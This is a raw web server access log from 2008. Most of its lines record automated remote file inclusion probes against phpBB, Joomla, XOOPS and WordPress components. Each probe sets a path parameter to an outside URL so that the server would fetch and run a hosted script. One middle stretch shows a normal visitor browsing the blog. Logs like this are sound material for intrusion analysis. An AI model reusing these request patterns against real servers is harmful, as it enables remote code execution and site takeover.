200.93.147.155 - - [12/Sep/2008:10:44:55 -0700] "GET //lang_main_album.php?phpbb_root_path=http://www.esdi.es/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.93.147.155 - - [12/Sep/2008:10:44:55 -0700] "GET /logs//lang_main_album.php?phpbb_root_path=http://www.esdi.es/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:44:57 -0700] "GET /logs/access_080525.log/SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:44:57 -0700] "GET /SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:44:57 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:45:10 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:45:13 -0700] "GET //admin.php?include_path=http://h1.ripway.com/copilot/files/gambar.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [12/Sep/2008:10:45:29 -0700] "GET /logs/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 200 64716 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [12/Sep/2008:10:45:30 -0700] "GET /?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 200 89159 "-" "libwww-perl/5.805" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:45:31 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:45:31 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:45:31 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:10:45:37 -0700] "GET /logs/access_080621.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:45:42 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:45:46 -0700] "GET /logs/access_080820.log/SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:45:56 -0700] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:45:56 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 200 64721 "-" "Mozilla/5.0" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:45:59 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:46:05 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:46:05 -0700] "GET /include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:46:05 -0700] "GET /logs/access_080628.log/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:46:05 -0700] "GET /logs/access_080518.log/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:46:08 -0700] "GET /logs/access_080830.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:46:11 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:46:12 -0700] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:46:13 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:46:13 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:46:13 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:46:19 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:46:25 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:46:39 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 200 89269 "-" "libwww-perl/5.65" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:46:45 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:46:58 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.antiquariatobova.com/menubg13.gif%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:46:58 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.antiquariatobova.com/menubg13.gif%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:46:58 -0700] "GET /logs/access_080619.log/include/bbs.lib.inc.php?site_path=http://www.antiquariatobova.com/menubg13.gif%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:46:58 -0700] "GET /logs/access.log/include/bbs.lib.inc.php?site_path=http://www.antiquariatobova.com/menubg13.gif%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:10:47:00 -0700] "GET /logs/access_080807.log/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.230.70 - - [12/Sep/2008:10:47:09 -0700] "GET /errors.php?error=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.13.230.70 - - [12/Sep/2008:10:47:09 -0700] "GET /logs/errors.php?error=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:47:12 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:47:20 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:43 -0700] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:44 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:47 -0700] "GET / HTTP/1.1" 200 88749 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:48 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:49 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:49 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:49 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:51 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:51 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:52 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:52 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/d68d_2.jpg HTTP/1.1" 200 6928 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:52 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:53 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:53 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:54 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:54 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:55 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:55 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:57 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&473 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
79.210.150.40 - - [12/Sep/2008:10:47:57 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=4&234 HTTP/1.1" 200 157653 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 7.0; Win32; 1&1); .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
58.177.86.197 - - [12/Sep/2008:10:48:08 -0700] "GET /logs/access_080810.log/index.php?option=com_frontpage&Itemid=1&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:48:09 -0700] "GET /logs/access_080830.log/help.php?css_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.177.86.197 - - [12/Sep/2008:10:48:09 -0700] "GET /index.php?option=com_frontpage&Itemid=1&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89449 "-" "libwww-perl/5.65" "www.dmulk.com"
58.177.86.197 - - [12/Sep/2008:10:48:11 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=1&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:48:14 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:48:14 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:48:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:48:15 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:48:25 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:48:34 -0700] "GET /logs/access_080502.log//?path%5Bdocroot%5D=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.155 - - [12/Sep/2008:10:48:51 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
200.93.147.155 - - [12/Sep/2008:10:48:51 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:49:19 -0700] "GET /logs/access_080623.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:10:49:21 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:49:22 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:49:28 -0700] "GET /logs/access_080716.log//phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ideaindustry.us/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:49:37 -0700] "GET /logs/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 200 64716 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:49:39 -0700] "GET /logs/access_080617.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:49:40 -0700] "GET /?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 200 89159 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:49:56 -0700] "GET /logs/access_080524.log%20/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:49:58 -0700] "GET /logs/access_080710.log/phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:10:50:25 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:10:50:27 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 200 89664 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:10:50:42 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:10:50:42 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:10:50:43 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:51:11 -0700] "GET /logs/access_080302.log/errors.php?error=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:51:15 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:51:20 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.249.23.190 - - [12/Sep/2008:10:51:21 -0700] "GET /logs/access_080825.log%20%20//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:10:51:22 -0700] "GET /logs/access_080617.log/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:51:24 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:51:25 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:51:25 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.93.147.155 - - [12/Sep/2008:10:51:38 -0700] "GET /errors.php?error=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:52:02 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:52:19 -0700] "GET /logs/access_080830.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:10:52:29 -0700] "GET /logs/access_080825.log/includes/search.php?GlobalSettings[templatesDirectory]=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:10:52:29 -0700] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:10:52:30 -0700] "GET /logs/includes/search.php?GlobalSettings[templatesDirectory]=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.230.70 - - [12/Sep/2008:10:52:45 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/linasuci/new.txt??? HTTP/1.1" 200 89494 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:10:53:09 -0700] "GET /logs/access_080107.log//includes/header.php?c_temp_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:10:53:09 -0700] "GET //includes/header.php?c_temp_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:10:53:09 -0700] "GET /logs//includes/header.php?c_temp_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:53:14 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:53:14 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
